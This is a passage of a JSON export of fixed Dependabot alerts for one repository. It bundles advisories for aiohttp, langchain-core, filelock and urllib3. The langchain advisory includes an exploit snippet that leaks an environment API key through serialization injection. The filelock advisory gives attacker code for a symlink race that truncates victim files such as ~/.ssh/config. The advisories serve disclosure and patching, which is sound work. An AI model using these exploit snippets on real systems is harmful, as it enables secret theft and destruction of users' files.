https://github.com/aio-libs/aiohttp/commit/f2a86fd5ac0383000d1715afddfa704413f0711e","severity":"low","identifiers":[{"value":"GHSA-54jq-c3m8-4m76","type":"GHSA"},{"value":"CVE-2025-69226","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-54jq-c3m8-4m76"},{"url":"https://github.com/aio-libs/aiohttp/commit/f2a86fd5ac0383000d1715afddfa704413f0711e"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-69226"},{"url":"https://github.com/advisories/GHSA-54jq-c3m8-4m76"}],"published_at":"2026-01-05T23:09:51Z","updated_at":"2026-01-06T16:06:50Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 
3.13.2","first_patched_version":{"identifier":"3.13.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U","score":2.7}},"epss":{"percentage":0.0007,"percentile":0.2125},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-22","name":"Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')"},{"cwe_id":"CWE-202","name":"Exposure of Sensitive Information Through Data Queries"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.2","first_patched_version":{"identifier":"3.13.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/9","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/9","created_at":"2026-04-30T08:37:31Z","updated_at":"2026-05-13T05:27:05Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:05Z","auto_dismissed_at":null},{"number":8,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-mqqc-3gqh-h2x8","cve_id":"CVE-2025-69225","summary":"AIOHTTP has unicode match groups in regexes for ASCII protocol elements","description":"### Summary\n\nThe parser allows non-ASCII decimals to be present in the Range header.\n\n### Impact\n\nThere is no known impact, but there is the possibility that there's a method to exploit a request smuggling vulnerability.\n\n----\n\nPatch: 
https://github.com/aio-libs/aiohttp/commit/c7b7a044f88c71cefda95ec75cdcfaa4792b3b96","severity":"low","identifiers":[{"value":"GHSA-mqqc-3gqh-h2x8","type":"GHSA"},{"value":"CVE-2025-69225","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-mqqc-3gqh-h2x8"},{"url":"https://github.com/aio-libs/aiohttp/commit/c7b7a044f88c71cefda95ec75cdcfaa4792b3b96"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-69225"},{"url":"https://github.com/advisories/GHSA-mqqc-3gqh-h2x8"}],"published_at":"2026-01-05T23:09:30Z","updated_at":"2026-01-06T16:06:45Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.2","first_patched_version":{"identifier":"3.13.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U","score":2.7}},"epss":{"percentage":0.00056,"percentile":0.17169},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-444","name":"Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 
3.13.2","first_patched_version":{"identifier":"3.13.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/8","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/8","created_at":"2026-04-30T08:37:31Z","updated_at":"2026-05-13T05:27:05Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:05Z","auto_dismissed_at":null},{"number":7,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-69f9-5gxw-wvc2","cve_id":"CVE-2025-69224","summary":"AIOHTTP's unicode processing of header values could cause parsing discrepancies","description":"### Summary\nThe Python HTTP parser may allow a request smuggling attack with the presence of non-ASCII characters.\n\n### Impact\nIf a pure Python version of aiohttp is installed (i.e. 
without the usual C extensions) or AIOHTTP_NO_EXTENSIONS is enabled, then an attacker may be able to execute a request smuggling attack to bypass certain firewalls or proxy protections.\n\n------\n\nPatch: https://github.com/aio-libs/aiohttp/commit/32677f2adfd907420c078dda6b79225c6f4ebce0","severity":"low","identifiers":[{"value":"GHSA-69f9-5gxw-wvc2","type":"GHSA"},{"value":"CVE-2025-69224","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-69f9-5gxw-wvc2"},{"url":"https://github.com/aio-libs/aiohttp/commit/32677f2adfd907420c078dda6b79225c6f4ebce0"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-69224"},{"url":"https://github.com/advisories/GHSA-69f9-5gxw-wvc2"}],"published_at":"2026-01-05T22:58:57Z","updated_at":"2026-01-06T16:06:41Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.2","first_patched_version":{"identifier":"3.13.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U","score":2.7}},"epss":{"percentage":0.00053,"percentile":0.16392},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-444","name":"Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 
3.13.2","first_patched_version":{"identifier":"3.13.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/7","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/7","created_at":"2026-04-30T08:37:31Z","updated_at":"2026-05-13T05:27:05Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:05Z","auto_dismissed_at":null},{"number":6,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-6mq8-rvhq-8wgg","cve_id":"CVE-2025-69223","summary":"AIOHTTP's HTTP Parser auto_decompress feature is vulnerable to zip bomb","description":"### Summary\nA zip bomb can be used to execute a DoS against the aiohttp server.\n\n### Impact\nAn attacker may be able to send a compressed request that when decompressed by aiohttp could exhaust the host's memory.\n\n------\n\nPatch: https://github.com/aio-libs/aiohttp/commit/2b920c39002cee0ec5b402581779bbaaf7c9138a","severity":"high","identifiers":[{"value":"GHSA-6mq8-rvhq-8wgg","type":"GHSA"},{"value":"CVE-2025-69223","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-6mq8-rvhq-8wgg"},{"url":"https://github.com/aio-libs/aiohttp/commit/2b920c39002cee0ec5b402581779bbaaf7c9138a"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-69223"},{"url":"https://github.com/advisories/GHSA-6mq8-rvhq-8wgg"}],"published_at":"2026-01-05T22:58:41Z","updated_at":"2026-01-06T16:06:18Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"high","vulnerable_version_range":"<= 
3.13.2","first_patched_version":{"identifier":"3.13.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00082,"percentile":0.23714},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cwes":[{"cwe_id":"CWE-409","name":"Improper Handling of Highly Compressed Data (Data Amplification)"},{"cwe_id":"CWE-770","name":"Allocation of Resources Without Limits or Throttling"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"high","vulnerable_version_range":"<= 3.13.2","first_patched_version":{"identifier":"3.13.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/6","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/6","created_at":"2026-04-30T08:37:31Z","updated_at":"2026-05-13T05:27:05Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:05Z","auto_dismissed_at":null},{"number":5,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"langchain-core"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-c67j-w6g6-q2cm","cve_id":"CVE-2025-68664","summary":"LangChain serialization injection vulnerability enables secret extraction in dumps/loads APIs","description":"## Summary\n\nA serialization injection vulnerability exists in LangChain's `dumps()` and `dumpd()` functions. The functions do not escape dictionaries with `'lc'` keys when serializing free-form dictionaries. The `'lc'` key is used internally by LangChain to mark serialized objects. 
When user-controlled data contains this key structure, it is treated as a legitimate LangChain object during deserialization rather than plain user data.\n\n### Attack surface\n\nThe core vulnerability was in `dumps()` and `dumpd()`: these functions failed to escape user-controlled dictionaries containing `'lc'` keys. When this unescaped data was later deserialized via `load()` or `loads()`, the injected structures were treated as legitimate LangChain objects rather than plain user data.\n\nThis escaping bug enabled several attack vectors:\n\n1. **Injection via user data**: Malicious LangChain object structures could be injected through user-controlled fields like `metadata`, `additional_kwargs`, or `response_metadata`\n2. **Class instantiation within trusted namespaces**: Injected manifests could instantiate any `Serializable` subclass, but only within the pre-approved trusted namespaces (`langchain_core`, `langchain`, `langchain_community`). This includes classes with side effects in `__init__` (network calls, file operations, etc.). Note that namespace validation was already enforced before this patch, so arbitrary classes outside these trusted namespaces could not be instantiated.\n\n### Security hardening\n\nThis patch fixes the escaping bug in `dumps()` and `dumpd()` and introduces new restrictive defaults in `load()` and `loads()`: allowlist enforcement via `allowed_objects=\"core\"` (restricted to [serialization mappings](https://github.com/langchain-ai/langchain/blob/master/libs/core/langchain_core/load/mapping.py)), `secrets_from_env` changed from `True` to `False`, and default Jinja2 template blocking via `init_validator`. These are breaking changes for some use cases.\n\n## Who is affected?\n\nApplications are vulnerable if they:\n\n1. **Use `astream_events(version=\"v1\")`** — The v1 implementation internally uses vulnerable serialization. Note: `astream_events(version=\"v2\")` is not vulnerable.\n2. 
**Use `Runnable.astream_log()`** — This method internally uses vulnerable serialization for streaming outputs.\n3. **Call `dumps()` or `dumpd()` on untrusted data, then deserialize with `load()` or `loads()`** — Trusting your own serialization output makes you vulnerable if user-controlled data (e.g., from LLM responses, metadata fields, or user inputs) contains `'lc'` key structures.\n4. **Deserialize untrusted data with `load()` or `loads()`** — Directly deserializing untrusted data that may contain injected `'lc'` structures.\n5. **Use `RunnableWithMessageHistory`** — Internal serialization in message history handling.\n6. **Use `InMemoryVectorStore.load()`** to deserialize untrusted documents.\n7. Load untrusted generations from cache using **`langchain-community` caches**.\n8. Load untrusted manifests from the LangChain Hub via **`hub.pull`**.\n9. Use **`StringRunEvaluatorChain`** on untrusted runs.\n10. Use **`create_lc_store`** or **`create_kv_docstore`** with untrusted documents.\n11. Use **`MultiVectorRetriever`** with byte stores containing untrusted documents.\n12. Use **`LangSmithRunChatLoader`** with runs containing untrusted messages.\n\nThe most common attack vector is through **LLM response fields** like `additional_kwargs` or `response_metadata`, which can be controlled via prompt injection and then serialized/deserialized in streaming operations.\n\n## Impact\n\nAttackers who control serialized data can extract environment variable secrets by injecting `{\"lc\": 1, \"type\": \"secret\", \"id\": [\"ENV_VAR\"]}` to load environment variables during deserialization (when `secrets_from_env=True`, which was the old default). 
They can also instantiate classes with controlled parameters by injecting constructor structures to instantiate any class within trusted namespaces with attacker-controlled parameters, potentially triggering side effects such as network calls or file operations.\n\nKey severity factors:\n\n- Affects the serialization path - applications trusting their own serialization output are vulnerable\n- Enables secret extraction when combined with `secrets_from_env=True` (the old default)\n- LLM responses in `additional_kwargs` can be controlled via prompt injection\n\n## Exploit example\n\n```python\nfrom langchain_core.load import dumps, load\nimport os\n\n# Attacker injects secret structure into user-controlled data\nattacker_dict = {\n \"user_data\": {\n \"lc\": 1,\n \"type\": \"secret\",\n \"id\": [\"OPENAI_API_KEY\"]\n }\n}\n\nserialized = dumps(attacker_dict) # Bug: does NOT escape the 'lc' key\n\nos.environ[\"OPENAI_API_KEY\"] = \"sk-secret-key-12345\"\ndeserialized = load(serialized, secrets_from_env=True)\n\nprint(deserialized[\"user_data\"]) # \"sk-secret-key-12345\" - SECRET LEAKED!\n\n```\n\n## Security hardening changes (breaking changes)\n\nThis patch introduces three breaking changes to `load()` and `loads()`:\n\n1. **New `allowed_objects` parameter** (defaults to `'core'`): Enforces allowlist of classes that can be deserialized. The `'all'` option corresponds to the list of objects [specified in `mappings.py`](https://github.com/langchain-ai/langchain/blob/master/libs/core/langchain_core/load/mapping.py) while the `'core'` option limits to objects within `langchain_core`. We recommend that users explicitly specify which objects they want to allow for serialization/deserialization.\n2. **`secrets_from_env` default changed from `True` to `False`**: Disables automatic secret loading from environment\n3. 
**New `init_validator` parameter** (defaults to `default_init_validator`): Blocks Jinja2 templates by default\n\n## Migration guide\n\n### No changes needed for most users\n\nIf you're deserializing standard LangChain types (messages, documents, prompts, trusted partner integrations like `ChatOpenAI`, `ChatAnthropic`, etc.), your code will work without changes:\n\n```python\nfrom langchain_core.load import load\n\n# Uses default allowlist from serialization mappings\nobj = load(serialized_data)\n\n```\n\n### For custom classes\n\nIf you're deserializing custom classes not in the serialization mappings, add them to the allowlist:\n\n```python\nfrom langchain_core.load import load\nfrom my_package import MyCustomClass\n\n# Specify the classes you need\nobj = load(serialized_data, allowed_objects=[MyCustomClass])\n```\n\n### For Jinja2 templates\n\nJinja2 templates are now blocked by default because they can execute arbitrary code. If you need Jinja2 templates, pass `init_validator=None`:\n\n```python\nfrom langchain_core.load import load\nfrom langchain_core.prompts import PromptTemplate\n\nobj = load(\n serialized_data,\n allowed_objects=[PromptTemplate],\n init_validator=None\n)\n\n```\n\n> [!WARNING]\n> Only disable `init_validator` if you trust the serialized data. Jinja2 templates can execute arbitrary Python code.\n\n### For secrets from environment\n\n`secrets_from_env` now defaults to `False`. 
If you need to load secrets from environment variables:\n\n```python\nfrom langchain_core.load import load\n\nobj = load(serialized_data, secrets_from_env=True)\n```\n\n\n## Credits\n\n* Dumps bug was reported by @yardenporat\n* Changes for security hardening due to findings from @0xn3va and @VladimirEliTokarev","severity":"critical","identifiers":[{"value":"GHSA-c67j-w6g6-q2cm","type":"GHSA"},{"value":"CVE-2025-68664","type":"CVE"}],"references":[{"url":"https://github.com/langchain-ai/langchain/security/advisories/GHSA-c67j-w6g6-q2cm"},{"url":"https://github.com/langchain-ai/langchain/pull/34455"},{"url":"https://github.com/langchain-ai/langchain/pull/34458"},{"url":"https://github.com/langchain-ai/langchain/commit/5ec0fa69de31bbe3d76e4cf9cd65a6accb8466c8"},{"url":"https://github.com/langchain-ai/langchain/commit/d9ec4c5cc78960abd37da79b0250f5642e6f0ce6"},{"url":"https://github.com/langchain-ai/langchain/releases/tag/langchain-core%3D%3D0.3.81"},{"url":"https://github.com/langchain-ai/langchain/releases/tag/langchain-core%3D%3D1.2.5"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-68664"},{"url":"https://github.com/advisories/GHSA-c67j-w6g6-q2cm"}],"published_at":"2025-12-23T18:46:13Z","updated_at":"2025-12-24T01:08:11Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"critical","vulnerable_version_range":">= 1.0.0, < 1.2.5","first_patched_version":{"identifier":"1.2.5"}},{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"critical","vulnerable_version_range":"< 0.3.81","first_patched_version":{"identifier":"0.3.81"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N","score":9.3},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.02264,"percentile":0.84694},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N","score":9.3},"cwes":[{"cwe_id":"CWE-502","name":"Deserialization of Untrusted 
Data"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"critical","vulnerable_version_range":">= 1.0.0, < 1.2.5","first_patched_version":{"identifier":"1.2.5"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/5","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/5","created_at":"2026-04-30T08:37:30Z","updated_at":"2026-05-13T05:27:05Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:05Z","auto_dismissed_at":null},{"number":4,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"filelock"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-w853-jp5j-5j7f","cve_id":"CVE-2025-68146","summary":"filelock has a TOCTOU race condition which allows symlink attacks during lock file creation","description":"### Impact\n\nA Time-of-Check-Time-of-Use (TOCTOU) race condition allows local attackers to corrupt or truncate arbitrary user files through symlink attacks. The vulnerability exists in both Unix and Windows lock file creation where filelock checks if a file exists before opening it with O_TRUNC. An attacker can create a symlink pointing to a victim file in the time gap between the check and open, causing os.open() to follow the symlink and truncate the target file.\n\n**Who is impacted:**\n\nAll users of filelock on Unix, Linux, macOS, and Windows systems. 
The vulnerability cascades to dependent libraries:\n\n- **virtualenv users**: Configuration files can be overwritten with virtualenv metadata, leaking sensitive paths\n- **PyTorch users**: CPU ISA cache or model checkpoints can be corrupted, causing crashes or ML pipeline failures\n- **poetry/tox users**: through using virtualenv or filelock on their own.\n\nAttack requires local filesystem access and ability to create symlinks (standard user permissions on Unix; Developer Mode on Windows 10+). Exploitation succeeds within 1-3 attempts when lock file paths are predictable.\n\n### Patches\n\nFixed in version **3.20.1**.\n\n**Unix/Linux/macOS fix:** Added O_NOFOLLOW flag to os.open() in UnixFileLock.\\_acquire() to prevent symlink following.\n\n**Windows fix:** Added GetFileAttributesW API check to detect reparse points (symlinks/junctions) before opening files in WindowsFileLock.\\_acquire().\n\n**Users should upgrade to filelock 3.20.1 or later immediately.**\n\n### Workarounds\n\nIf immediate upgrade is not possible:\n\n1. Use SoftFileLock instead of UnixFileLock/WindowsFileLock (note: different locking semantics, may not be suitable for all use cases)\n2. Ensure lock file directories have restrictive permissions (chmod 0700) to prevent untrusted users from creating symlinks\n3. Monitor lock file directories for suspicious symlinks before running trusted applications\n\n**Warning:** These workarounds provide only partial mitigation. The race condition remains exploitable. 
Upgrading to version 3.20.1 is strongly recommended.\n\n______________________________________________________________________\n\n## Technical Details: How the Exploit Works\n\n### The Vulnerable Code Pattern\n\n**Unix/Linux/macOS** (`src/filelock/_unix.py:39-44`):\n\n```python\ndef _acquire(self) -> None:\n ensure_directory_exists(self.lock_file)\n open_flags = os.O_RDWR | os.O_TRUNC # (1) Prepare to truncate\n if not Path(self.lock_file).exists(): # (2) CHECK: Does file exist?\n open_flags |= os.O_CREAT\n fd = os.open(self.lock_file, open_flags, ...) # (3) USE: Open and truncate\n```\n\n**Windows** (`src/filelock/_windows.py:19-28`):\n\n```python\ndef _acquire(self) -> None:\n raise_on_not_writable_file(self.lock_file) # (1) Check writability\n ensure_directory_exists(self.lock_file)\n flags = os.O_RDWR | os.O_CREAT | os.O_TRUNC # (2) Prepare to truncate\n fd = os.open(self.lock_file, flags, ...) # (3) Open and truncate\n```\n\n### The Race Window\n\nThe vulnerability exists in the gap between operations:\n\n**Unix variant:**\n\n```\nTime Victim Thread Attacker Thread\n---- ------------- ---------------\nT0 Check: lock_file exists? → False\nT1 ↓ RACE WINDOW\nT2 Create symlink: lock → victim_file\nT3 Open lock_file with O_TRUNC\n → Follows symlink\n → Opens victim_file\n → Truncates victim_file to 0 bytes! ☠️\n```\n\n**Windows variant:**\n\n```\nTime Victim Thread Attacker Thread\n---- ------------- ---------------\nT0 Check: lock_file writable?\nT1 ↓ RACE WINDOW\nT2 Create symlink: lock → victim_file\nT3 Open lock_file with O_TRUNC\n → Follows symlink/junction\n → Opens victim_file\n → Truncates victim_file to 0 bytes! ☠️\n```\n\n### Step-by-Step Attack Flow\n\n**1. Attacker Setup:**\n\n```python\n# Attacker identifies target application using filelock\nlock_path = \"/tmp/myapp.lock\" # Predictable lock path\nvictim_file = \"/home/victim/.ssh/config\" # High-value target\n```\n\n**2. 
Attacker Creates Race Condition:**\n\n```python\nimport os\nimport threading\n\n\ndef attacker_thread():\n # Remove any existing lock file\n try:\n os.unlink(lock_path)\n except FileNotFoundError:\n pass\n\n # Create symlink pointing to victim file\n os.symlink(victim_file, lock_path)\n print(f\"[Attacker] Created: {lock_path} → {victim_file}\")\n\n\n# Launch attack\nthreading.Thread(target=attacker_thread).start()\n```\n\n**3. Victim Application Runs:**\n\n```python\nfrom filelock import UnixFileLock\n\n# Normal application code\nlock = UnixFileLock(\"/tmp/myapp.lock\")\nlock.acquire() # ← VULNERABILITY TRIGGERED HERE\n# At this point, /home/victim/.ssh/config is now 0 bytes!\n```\n\n**4. What Happens Inside os.open():**\n\nOn Unix systems, when `os.open()` is called:\n\n```c\n// Linux kernel behavior (simplified)\nint open(const char *pathname, int flags) {\n struct file *f = path_lookup(pathname); // Resolves symlinks by default!\n\n if (flags & O_TRUNC) {\n truncate_file(f); // ← Truncates the TARGET of the symlink\n }\n\n return file_descriptor;\n}\n```\n\nWithout `O_NOFOLLOW` flag, the kernel follows the symlink and truncates the target file.\n\n### Why the Attack Succeeds Reliably\n\n**Timing Characteristics:**\n\n- **Check operation** (Path.exists()): ~100-500 nanoseconds\n- **Symlink creation** (os.symlink()): ~1-10 microseconds\n- **Race window**: ~1-5 microseconds (very small but exploitable)\n- **Thread scheduling quantum**: ~1-10 milliseconds\n\n**Success factors:**\n\n1. **Tight loop**: Running attack in a loop hits the race window within 1-3 attempts\n2. **CPU scheduling**: Modern OS thread schedulers frequently context-switch during I/O operations\n3. **No synchronization**: No atomic file creation prevents the race\n4. 
**Symlink speed**: Creating symlinks is extremely fast (metadata-only operation)\n\n### Real-World Attack Scenarios\n\n**Scenario 1: virtualenv Exploitation**\n\n```python\n# Victim runs: python -m venv /tmp/myenv\n# Attacker racing to create:\nos.symlink(\"/home/victim/.bashrc\", \"/tmp/myenv/pyvenv.cfg\")\n\n# Result: /home/victim/.bashrc overwritten with:\n# home = /usr/bin/python3\n# include-system-site-packages = false\n# version = 3.11.2\n# ← Original .bashrc contents LOST + virtualenv metadata LEAKED to attacker\n```\n\n**Scenario 2: PyTorch Cache Poisoning**\n\n```python\n# Victim runs: import torch\n# PyTorch checks CPU capabilities, uses filelock on cache\n# Attacker racing to create:\nos.symlink(\"/home/victim/.torch/compiled_model.pt\", \"/home/victim/.cache/torch/cpu_isa_check.lock\")\n\n# Result: Trained ML model checkpoint truncated to 0 bytes\n# Impact: Weeks of training lost, ML pipeline DoS\n```\n\n### Why Standard Defenses Don't Help\n\n**File permissions don't prevent this:**\n\n- Attacker doesn't need write access to victim_file\n- os.open() with O_TRUNC follows symlinks using the *victim's* permissions\n- The victim process truncates its own file\n\n**Directory permissions help but aren't always feasible:**\n\n- Lock files often created in shared /tmp directory (mode 1777)\n- Applications may not control lock file location\n- Many apps use predictable paths in user-writable directories\n\n**File locking doesn't prevent this:**\n\n- The truncation happens *during* the open() call, before any lock is acquired\n- fcntl.flock() only prevents concurrent lock acquisition, not symlink attacks\n\n### Exploitation Proof-of-Concept Results\n\nFrom empirical testing with the provided PoCs:\n\n**Simple Direct Attack** (`filelock_simple_poc.py`):\n\n- Success rate: 33% per attempt (1 in 3 tries)\n- Average attempts to success: 2.1\n- Target file reduced to 0 bytes in \\<100ms\n\n**virtualenv Attack** (`weaponized_virtualenv.py`):\n\n- Success rate: ~90% on 
first attempt (deterministic timing)\n- Information leaked: File paths, Python version, system configuration\n- Data corruption: Complete loss of original file contents\n\n**PyTorch Attack** (`weaponized_pytorch.py`):\n\n- Success rate: 25-40% per attempt\n- Impact: Application crashes, model loading failures\n- Recovery: Requires cache rebuild or model retraining\n\n**Discovered and reported by:** George Tsigourakos (@tsigouris007)","severity":"medium","identifiers":[{"value":"GHSA-w853-jp5j-5j7f","type":"GHSA"},{"value":"CVE-2025-68146","type":"CVE"}],"references":[{"url":"https://github.com/tox-dev/filelock/security/advisories/GHSA-w853-jp5j-5j7f"},{"url":"https://github.com/tox-dev/filelock/commit/4724d7f8c3393ec1f048c93933e6e3e6ec321f0e"},{"url":"https://github.com/tox-dev/filelock/releases/tag/3.20.1"},{"url":"https://learn.microsoft.com/en-us/windows/win32/fileio/file-attribute-constants"},{"url":"https://pubs.opengroup.org/onlinepubs/9699919799/functions/open.html"},{"url":"https://github.com/advisories/GHSA-w853-jp5j-5j7f"}],"published_at":"2025-12-16T20:52:55Z","updated_at":"2025-12-16T20:52:56Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"filelock"},"severity":"medium","vulnerable_version_range":"< 3.20.1","first_patched_version":{"identifier":"3.20.1"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H","score":6.3},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":4.0e-05,"percentile":0.00136},"cvss":{"vector_string":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H","score":6.3},"cwes":[{"cwe_id":"CWE-59","name":"Improper Link Resolution Before File Access ('Link Following')"},{"cwe_id":"CWE-362","name":"Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')"},{"cwe_id":"CWE-367","name":"Time-of-check Time-of-use (TOCTOU) Race 
Condition"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"filelock"},"severity":"medium","vulnerable_version_range":"< 3.20.1","first_patched_version":{"identifier":"3.20.1"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/4","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/4","created_at":"2026-04-30T08:37:30Z","updated_at":"2026-05-13T05:27:05Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:05Z","auto_dismissed_at":null},{"number":3,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"urllib3"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-2xpw-w6gg-jr37","cve_id":"CVE-2025-66471","summary":"urllib3 streaming API improperly handles highly compressed data","description":"### Impact\n\nurllib3's [streaming API](https://urllib3.readthedocs.io/en/2.5.0/advanced-usage.html#streaming-and-i-o) is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once.\n\nWhen streaming a compressed response, urllib3 can perform decoding or decompression based on the HTTP `Content-Encoding` header (e.g., `gzip`, `deflate`, `br`, or `zstd`). The library must read compressed data from the network and decompress it until the requested chunk size is met. Any resulting decompressed data that exceeds the requested amount is held in an internal buffer for the next read operation.\n\nThe decompression logic could cause urllib3 to fully decode a small amount of highly compressed data in a single operation. 
This can result in excessive resource consumption (high CPU usage and massive memory allocation for the decompressed data; CWE-409) on the client side, even if the application only requested a small chunk of data.\n\n\n### Affected usages\n\nApplications and libraries using urllib3 version 2.5.0 and earlier to stream large compressed responses or content from untrusted sources.\n\n`stream()`, `read(amt=256)`, `read1(amt=256)`, `read_chunked(amt=256)`, `readinto(b)` are examples of `urllib3.HTTPResponse` method calls using the affected logic unless decoding is disabled explicitly.\n\n\n### Remediation\n\nUpgrade to at least urllib3 v2.6.0 in which the library avoids decompressing data that exceeds the requested amount.\n\nIf your environment contains a package facilitating the Brotli encoding, upgrade to at least Brotli 1.2.0 or brotlicffi 1.2.0.0 too. These versions are enforced by the `urllib3[brotli]` extra in the patched versions of urllib3.\n\n\n### Credits\n\nThe issue was reported by @Cycloctane.\nSupplemental information was provided by @stamparm during a security audit performed by [7ASecurity](https://7asecurity.com/) and facilitated by 